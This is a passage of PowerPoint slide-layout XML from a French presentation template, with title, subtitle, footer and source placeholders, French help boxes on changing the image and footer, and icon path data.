            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67D32760-F714-4000-B9CB-3BBC57FE06F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="558165"/>
            <a:ext cx="4128228" cy="424732"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Groupe 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{490AEE67-A6FC-480E-AC95-BDCE150C17BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{975701B5-99FB-47A9-AF37-83AFA334980F}"/>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5" name="Rectangle 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F24AF9E8-9CA6-4F78-8673-0F291DF8A4A4}"/>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26" name="Groupe 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E53FA5D-FEF1-46C7-8763-11AFF9842C40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="7045594" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="Groupe 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D2AB1F0-B1EE-4879-B08E-D875FA071FB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7045594" y="2588002"/>
              <a:ext cx="1885826" cy="1681996"/>
              <a:chOff x="2689543" y="1651754"/>
              <a:chExt cx="1885826" cy="1681996"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C67638BB-D5A5-461C-AD28-B83184ADD1DA}"/>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31" name="Rectangle 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0398AE0-BE82-47A0-A0BB-4B5E1681B08D}"/>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28" name="Image 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93275D4D-ABD5-452F-A46A-61DA4377E34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29" name="Image 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A4ABE91-4B97-4700-B4DE-90EDF914C7C5}"/>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78167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 SubTitle Txt + Pict">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7E264929-2D45-4AA3-8A6D-781013C9BC75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7101840" y="0"/>
            <a:ext cx="5090160" cy="6858000"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du pied de page 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FD4E716-71CF-4AD2-80E1-E25BBCD7FA8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Titre de la présentation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4603546-8CC4-465D-A51B-B945CFBBA500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295191" y="1668111"/>
            <a:ext cx="6558875" cy="2215991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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15" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CE76A34-376E-4A19-985C-5FD76186E11B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805930" y="6457666"/>
            <a:ext cx="5517319" cy="216982"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="900" i="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="219075" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="385763" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Sources:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Espace réservé du numéro de diapositive 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E01E6BC8-77C6-4E8A-A7F5-73842FB99511}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Image 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE536E61-6C3F-4062-9DEA-A294AEE6864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
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56AA7837-F2F5-436A-A0F2-20DDC928F2EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="558165"/>
            <a:ext cx="4128228" cy="424732"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gilroy Bold" panose="020B0604020202020204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>la présentation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56DA2B65-421E-4A82-BDC9-F13F5A2DF494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525011" y="1003988"/>
            <a:ext cx="6329055" cy="341632"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" cap="none" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sous-titre de la slide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Groupe 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B43616DE-B6E5-4AED-927F-9F207B551060}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65326C5A-6CDE-45A1-B8D1-25B20A9D9C70}"/>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4" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA79DF25-599B-477E-BD6B-85AD1D9362E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="511520" y="2946559"/>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schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Gilroy Bold" panose="00000800000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Pour changer d’image :</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Supprimer l’image</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>en place</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Cliquer sur l’icone</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>au milieu du bloc </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Sélectionner l’image souhaitée dans votre ordinateur</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Groupe 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B789411D-4A75-4712-AE14-6A1AF6DA2773}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E10DF80-04F3-432A-B128-F26F9CF8E1B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1241708" y="2588002"/>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28" name="Rectangle 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF3E2BF-349A-4724-A646-26E635953F1E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="511520" y="2946559"/>
              <a:ext cx="1885826" cy="1631216"/>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changer le pied</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insérer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Cliquer sur « en-tête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et pied de page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Écrire le texte souhaité</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dans la case « Pied de page »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Cliquez sur </a:t>
              </a:r>
              <a:br>
                <a:rPr kumimoji="0" lang="fr-FR" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr kumimoji="0" lang="fr-FR" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>« Appliquer partout »</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Groupe 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB6C2886-437E-4C3A-8CD4-037EE078D212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="1852009"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="7045594" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39" name="Groupe 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{347BFE77-6EC6-4E55-AE2E-A6971506D886}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7045594" y="2588002"/>
              <a:ext cx="1885826" cy="1681996"/>
              <a:chOff x="2689543" y="1651754"/>
              <a:chExt cx="1885826" cy="1681996"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8B239C5-7761-4C43-9F81-1D56E7B8841A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3419731" y="1651754"/>
                <a:ext cx="425450" cy="425450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 173 w 346"/>
                  <a:gd name="T1" fmla="*/ 0 h 346"/>
                  <a:gd name="T2" fmla="*/ 0 w 346"/>
                  <a:gd name="T3" fmla="*/ 173 h 346"/>
                  <a:gd name="T4" fmla="*/ 173 w 346"/>
                  <a:gd name="T5" fmla="*/ 346 h 346"/>
                  <a:gd name="T6" fmla="*/ 346 w 346"/>
                  <a:gd name="T7" fmla="*/ 173 h 346"/>
                  <a:gd name="T8" fmla="*/ 173 w 346"/>
                  <a:gd name="T9" fmla="*/ 0 h 346"/>
                  <a:gd name="T10" fmla="*/ 201 w 346"/>
                  <a:gd name="T11" fmla="*/ 247 h 346"/>
                  <a:gd name="T12" fmla="*/ 128 w 346"/>
                  <a:gd name="T13" fmla="*/ 290 h 346"/>
                  <a:gd name="T14" fmla="*/ 111 w 346"/>
                  <a:gd name="T15" fmla="*/ 278 h 346"/>
                  <a:gd name="T16" fmla="*/ 112 w 346"/>
                  <a:gd name="T17" fmla="*/ 272 h 346"/>
                  <a:gd name="T18" fmla="*/ 153 w 346"/>
                  <a:gd name="T19" fmla="*/ 172 h 346"/>
                  <a:gd name="T20" fmla="*/ 150 w 346"/>
                  <a:gd name="T21" fmla="*/ 165 h 346"/>
                  <a:gd name="T22" fmla="*/ 126 w 346"/>
                  <a:gd name="T23" fmla="*/ 175 h 346"/>
                  <a:gd name="T24" fmla="*/ 121 w 346"/>
                  <a:gd name="T25" fmla="*/ 173 h 346"/>
                  <a:gd name="T26" fmla="*/ 126 w 346"/>
                  <a:gd name="T27" fmla="*/ 163 h 346"/>
                  <a:gd name="T28" fmla="*/ 195 w 346"/>
                  <a:gd name="T29" fmla="*/ 128 h 346"/>
                  <a:gd name="T30" fmla="*/ 205 w 346"/>
                  <a:gd name="T31" fmla="*/ 141 h 346"/>
                  <a:gd name="T32" fmla="*/ 201 w 346"/>
                  <a:gd name="T33" fmla="*/ 154 h 346"/>
                  <a:gd name="T34" fmla="*/ 164 w 346"/>
                  <a:gd name="T35" fmla="*/ 247 h 346"/>
                  <a:gd name="T36" fmla="*/ 169 w 346"/>
                  <a:gd name="T37" fmla="*/ 252 h 346"/>
                  <a:gd name="T38" fmla="*/ 196 w 346"/>
                  <a:gd name="T39" fmla="*/ 235 h 346"/>
                  <a:gd name="T40" fmla="*/ 204 w 346"/>
                  <a:gd name="T41" fmla="*/ 231 h 346"/>
                  <a:gd name="T42" fmla="*/ 207 w 346"/>
                  <a:gd name="T43" fmla="*/ 234 h 346"/>
                  <a:gd name="T44" fmla="*/ 201 w 346"/>
                  <a:gd name="T45" fmla="*/ 247 h 346"/>
                  <a:gd name="T46" fmla="*/ 192 w 346"/>
                  <a:gd name="T47" fmla="*/ 98 h 346"/>
                  <a:gd name="T48" fmla="*/ 182 w 346"/>
                  <a:gd name="T49" fmla="*/ 95 h 346"/>
                  <a:gd name="T50" fmla="*/ 173 w 346"/>
                  <a:gd name="T51" fmla="*/ 76 h 346"/>
                  <a:gd name="T52" fmla="*/ 186 w 346"/>
                  <a:gd name="T53" fmla="*/ 52 h 346"/>
                  <a:gd name="T54" fmla="*/ 198 w 346"/>
                  <a:gd name="T55" fmla="*/ 48 h 346"/>
                  <a:gd name="T56" fmla="*/ 219 w 346"/>
                  <a:gd name="T57" fmla="*/ 70 h 346"/>
                  <a:gd name="T58" fmla="*/ 192 w 346"/>
                  <a:gd name="T59" fmla="*/ 98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46" h="346">
                    <a:moveTo>
                      <a:pt x="173" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="0"/>
                      <a:pt x="0" y="78"/>
                      <a:pt x="0" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="268"/>
                      <a:pt x="78" y="346"/>
                      <a:pt x="173" y="346"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="268" y="346"/>
                      <a:pt x="346" y="268"/>
                      <a:pt x="346" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="346" y="78"/>
                      <a:pt x="268" y="0"/>
                      <a:pt x="173" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="201" y="247"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="182" y="270"/>
                      <a:pt x="143" y="290"/>
                      <a:pt x="128" y="290"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="290"/>
                      <a:pt x="111" y="284"/>
                      <a:pt x="111" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="276"/>
                      <a:pt x="111" y="276"/>
                      <a:pt x="112" y="272"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="238"/>
                      <a:pt x="138" y="213"/>
                      <a:pt x="153" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="154" y="169"/>
                      <a:pt x="153" y="165"/>
                      <a:pt x="150" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="165"/>
                      <a:pt x="136" y="169"/>
                      <a:pt x="126" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="177"/>
                      <a:pt x="121" y="174"/>
                      <a:pt x="121" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="170"/>
                      <a:pt x="123" y="167"/>
                      <a:pt x="126" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="154"/>
                      <a:pt x="171" y="128"/>
                      <a:pt x="195" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="199" y="128"/>
                      <a:pt x="205" y="137"/>
                      <a:pt x="205" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="205" y="144"/>
                      <a:pt x="202" y="151"/>
                      <a:pt x="201" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
